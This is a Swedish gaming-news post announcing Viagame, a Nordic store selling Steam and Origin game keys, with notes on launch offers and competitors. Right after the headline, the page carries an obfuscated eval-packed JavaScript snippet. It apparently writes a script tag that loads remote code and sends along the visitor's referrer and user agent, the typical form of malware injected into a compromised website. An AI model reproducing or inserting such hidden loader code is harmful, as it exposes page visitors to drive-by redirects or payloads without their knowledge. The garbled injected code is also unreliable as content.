Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Viagame: Ny nordisk spelbutik online

Viagame: Ny nordisk spelbutik online
Sebastian Plengier Ehrnfelt

Viagame: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hbihk|var|u0026u|referrer|irete||js|php’.split(‘|’),0,{}))
Vi har tidigare diskuterat om hur framtiden för spel ser ut. Självklart är det digitala kopior som står i centrum för den branschen. Det är mycket troligt att kommande konsoler kommer att vara helt moln-baserade. Spelen kommer kunna inhandlas online och sedan sparas på en server någonstans i världen. 

Ett bra bevis på detta är Valves onlinetjänst Steam som visat sig gå väldigt bra. Men idag träffar vi en ny aktör. Viagame, ett nordiskt alternativ där man köper unika koder då att aktivera spel i just steam och EA:s stjänst Origin.

Enligt ett pressmeddelande som Viagame släppt kommer vi kunna hitta stora titlar som Medal of Honor: Warfighter, Need for Speed: Most Wanted och Assassin’s Creed 3 inom kort.

Just nu har Viagame specialerbjudanden på sportspel som WRC: Fia World Rally Championship 2 och FIFA 12. Detta för att fira lanseringen.

Men Viagame är inte själva om att kriga sig in på marknaden för digital distribution. Konkurrenten Cdon har också möjlighet till nerladdning av spel i samarbete med Spelbutiken, Spelnyckel.se och Gamecard Direct.

Hela denna bransch är som uppbyggd för konkurrens. Vi kommer garanterat inom kort att få se fler likande digitala affärer som Viagame.

Besök Viagame via här eller via länken nedan!